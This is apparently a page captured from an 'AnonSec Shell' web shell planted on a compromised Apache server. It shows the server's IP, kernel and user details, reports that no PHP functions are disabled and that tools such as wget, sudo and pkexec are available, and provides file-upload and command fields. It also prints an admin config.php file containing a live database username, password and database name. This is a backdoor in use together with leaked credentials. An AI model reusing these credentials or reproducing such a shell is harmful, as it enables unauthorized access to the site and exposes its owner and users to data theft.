AnonSec Shell
Server IP : 92.204.138.22  /  Your IP : 18.188.35.25
Web Server : Apache
System : Linux ns1009439.ip-92-204-138.us 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
User : internationaljou ( 1019)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/internationaljou/SSRG-01-03-2024/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/internationaljou/SSRG-01-03-2024/admin//config.php
<?php
	/*ini_set('memory_limit', '96M');
	ini_set('post_max_size', '64M');
	ini_set('upload_max_filesize', '64M'); */
	
	$servername = "localhost";
	$username = "internationaljou_ssrgfulluser";
	$password = "sgZI.Z@[;T*c";
	$dbname = "internationaljou_ssrgfulldb";
	
	// $servername = "localhost";
	// $username = "root";
	// $password = "";
	// $dbname = "veterantech_ssrgfull_dbnew";

	
	$conn = mysqli_connect($servername, $username, $password, $dbname) or die("Connection failed: " . mysqli_connect_error());
	$check = mysqli_set_charset($conn, "utf8");
	
/*$db_connect = mysql_connect($servername,$username,$password);
//$con = mysqli_connect($db_host,$db_user,$db_pass);
//$db = new mysqli($db_host,$db_user,$db_pass,$db_name);
if($db_connect == TRUE)
{
  mysql_select_db($dbname);
}
else
{
 echo 'DB ERROR '.  mysql_error();
}*/
?>

Anon7 - 2022
AnonSec Team